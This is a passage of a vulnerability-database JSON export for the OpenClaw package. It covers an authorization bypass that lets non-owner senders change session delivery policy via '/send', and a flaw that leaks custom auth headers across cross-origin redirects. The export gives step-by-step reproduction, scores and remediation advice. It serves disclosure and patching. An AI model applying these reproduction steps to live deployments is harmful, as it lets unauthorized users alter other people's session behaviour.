admin-scoped, which reinforces that session-delivery-policy mutation is treated as privileged state.\n\nVersion history:\n- The vulnerable handler exists in release history going back at least to commit `ea018a68ccb92dbc735bc1df9880d5c95c63ca35` (`refactor(auto-reply): split reply pipeline`).\n- Earliest released affected tag found: `v2026.1.14-1`\n- Latest released affected tag verified: `v2026.3.23`\n\n**Technical Reproduction**  \n1. Check out the shipped release tag `v2026.3.23`.\n2. Configure a channel where:\n   - a non-owner sender is allowed to run commands, for example through `commands.allowFrom`;\n   - the owner identity is distinct, for example via `commands.ownerAllowFrom`.\n3. Start or reuse a session with a live `sessionEntry` and `sessionStore`.\n4. Send `/send off` as the non-owner but command-authorized sender.\n5. Confirm the resolved command context has:\n   - `isAuthorizedSender === true`\n   - `senderIsOwner === false`\n6. Observe that the handler still accepts the command, mutates `sessionEntry.sendPolicy`, and persists the session entry.\n\n**Demonstrated Impact**  \nThe vulnerable handler performs a real persistent session-state change:\n- `src/auto-reply/reply/commands-session.ts:232-238`\n  - `/send inherit` deletes `sessionEntry.sendPolicy`\n  - other modes assign `sessionEntry.sendPolicy = sendPolicyCommand.mode`\n  - the handler then calls `persistSessionEntry(params)`\n\nThe mutation is not gated by owner status, only by general command authorization.\n\nThat changes subsequent delivery behavior for the current session, which matches the documented meaning of `sendPolicy`.\n\n**Environment**  \n- Product: OpenClaw\n- Verified shipped tag: `v2026.3.23`\n- Shipped tag commit: `ccfeecb6887cd97937e33a71877ad512741e82b2`\n- Published GitHub release time: `2026-03-23T23:15:50Z`\n- Verification date: `2026-03-24`\n\n**Duplicate Check**  \nUpon inspection there is no preexisting GHSA for `/send`.\n\nThis is distinct from:\n- 
`GHSA-r7vr-gr74-94p8`\n  - that advisory covered owner-only authorization bypasses for `/config` and `/debug`, not `/send`.\n\nThis is the same authorization class, but a different privileged command surface that still lacks the owner check.\n\n**In Scope Check**  \nThis report is in scope under `SECURITY.md` because:\n- it does **not** rely on adversarial operators sharing one gateway host or config;\n- it does **not** rely on trusted local state tampering;\n- `SECURITY.md:151-152` explicitly says non-owner sender status matters for owner-only tools and commands;\n- `/send` is explicitly documented as owner-only, so this is a direct owner-only authorization bypass, not a complaint about normal shared-agent steering.\n\nThis is therefore a concrete authorization flaw against a documented product boundary.\n\n**Remediation Advice**  \n1. Change `/send` to require owner status, not just command authorization.\n2. Reuse the same owner-only rejection pattern already used by privileged command surfaces such as `/config`, `/debug`, and owner-only `/plugins` writes.\n3. Add regression coverage for the exact case where:\n   - a non-owner sender is command-authorized;\n   - `/send` must still be rejected unless `senderIsOwner === true`.\n4. 
Verify that the owner can still use `/send on|off|inherit` normally.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35620","reference_id":"","reference_type":"","scores":[{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20449","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20489","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20501","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35620"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/555b2578a8cc6e1b93f717496935ead97bfbed8b","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:56Z/"}],"url":"https://github.com/openclaw/openclaw/commit/555b2578a8cc6e1b93f717496935ead97bfbed8b"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ccfeecb6887cd97937e33a71877ad512741e82b2","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:
N/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:56Z/"}],"url":"https://github.com/openclaw/openclaw/commit/ccfeecb6887cd97937e33a71877ad512741e82b2"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ea018a68ccb92dbc735bc1df9880d5c95c63ca35","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:56Z/"}],"url":"https://github.com/openclaw/openclaw/commit/ea018a68ccb92dbc735bc1df9880d5c95c63ca35"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-39mp-545q-w789","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:56Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-39mp-545q-w789"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vqvg-86cc-cg83","reference_id":"","reference_type":"","scores":[{"
value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:56Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vqvg-86cc-cg83"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35620","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35620"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-missing-authorization-in-send-and-allowlist-chat-commands","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:56Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-missing-authorization-in-send-and-allowlist-chat-commands"},{"reference_url":"https://github.com/advisories/GHSA-39mp-545q-w789","reference_id":"GHSA-39mp-545q-w789","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-39mp-545q-w789"}],"
fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110567?format=json","purl":"pkg:npm/openclaw@2026.3.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5dj5-mk23-kyds"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-66nc-bn98-nbas"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCI
D-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-acy1-83py-efhr"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCI
D-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCI
D-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-utv2-tyje-kfht"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vv2u-u7mn-rfe1"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCI
D-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"}],"aliases":["CVE-2026-35620","GHSA-39mp-545q-w789"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-j96c-kau3-7fag"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50758?format=json","vulnerability_id":"VCID-jad8-5duz-dqg1","summary":"OpenClaw: fetch-guard forwards custom authorization headers across cross-origin redirects\nOpenClaw's `fetchWithSsrFGuard(...)` followed cross-origin redirects while preserving arbitrary caller-supplied headers except for a narrow denylist (`Authorization`, `Proxy-Authorization`, `Cookie`, `Cookie2`). 
This allowed custom authorization headers, such as `X-Api-Key` and `Private-Token`, and similar sensitive headers to be forwarded to a different origin after a redirect.\n\nThe fix switches cross-origin redirect handling from a narrow sensitive-header denylist to a safe-header allowlist, so only benign headers, such as content-negotiation headers and cache validators, survive an origin change.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32913","reference_id":"","reference_type":"","scores":[{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.14121","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.14157","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.14154","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32913"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/46715371b0612a6f9114dffd1466941ac476cef5","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T13:45:01Z/"}],"url":"https://github.com/openclaw/ope
nclaw/commit/46715371b0612a6f9114dffd1466941ac476cef5"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7"},{"reference_url":"https://vulncheck.com/advisories/openclaw-mar-custom-authorization-header-leakage-via-cross-origin-redirects","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T13:45:01Z/"}],"url":"https://vulncheck.com/advisories/openclaw-mar-custom-authorization-header-leakage-via-cross-origin-redirects"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32913","reference_id":"CVE-2026-32913","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32913"},{"reference_url":"https://github.com/advisories/GHSA-6mgf-v5j7-45cr","reference_id":"GHSA-6mgf-v5j7-45cr","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url"
:"https://github.com/advisories/GHSA-6mgf-v5j7-45cr"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6mgf-v5j7-45cr","reference_id":"GHSA-6mgf-v5j7-45cr","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T13:45:01Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6mgf-v5j7-45cr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74554?format=json","purl":"pkg:npm/openclaw@2026.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability"
:"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp